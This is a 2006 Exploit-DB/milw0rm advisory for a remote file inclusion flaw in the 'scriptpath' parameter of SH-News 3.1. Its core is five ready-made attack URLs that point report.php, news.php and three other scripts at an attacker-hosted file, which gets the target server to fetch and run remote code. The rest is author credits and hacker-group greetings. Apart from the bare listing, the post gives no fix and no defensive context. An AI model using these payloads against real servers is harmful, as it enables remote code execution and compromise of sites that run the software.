SH-News 3.1 - 'scriptpath' Remote File Inclusion

EDB-ID:

2518




Platform:

PHP

Date:

2006-10-11


#==================================================================
#  SH-News (RFI)
#==================================================================
# Info:-
#
# Scripts:  SH-News
# Download: http://www.hotscripts.com/jump.php?listing_id=19561&jump_type=1
# Version : 3.1
# Dork & vuln : download scripts and think :)
# Note : The vuln not tested on other version :)
#
#==================================================================
#Exploit :
#
#http://localhost/path/report.php?scriptpath=http://EvElCoDe.txt?
#http://localhost/path/archive.php?scriptpath=http://EvElCoDe.txt?
#http://localhost/path/comments.php?scriptpath=http://EvElCoDe.txt?
#http://localhost/path/init.php?scriptpath=http://EvElCoDe.txt?
#http://localhost/path/news.php?scriptpath=http://EvElCoDe.txt?
#
#==================================================================
#Discoverd By : v1per-haCker
#
#Conatact : v1per-hacker[at]hotmail.com
#XP10_hackEr Team
#Greetz to : abu_shahad ; RooT-shilL ; hitler_jeddah ; BooB11 ; FaTaL ;
#               ThE-WoLf-KsA ; mohandko ; fooooz ; maVen ; fucker_net ;
#	    metoovet
#and all members in XP10_hackEr Team
#thanx to str0ke :)
#WWW.XP10.COM
===================================================================

# milw0rm.com [2006-10-11]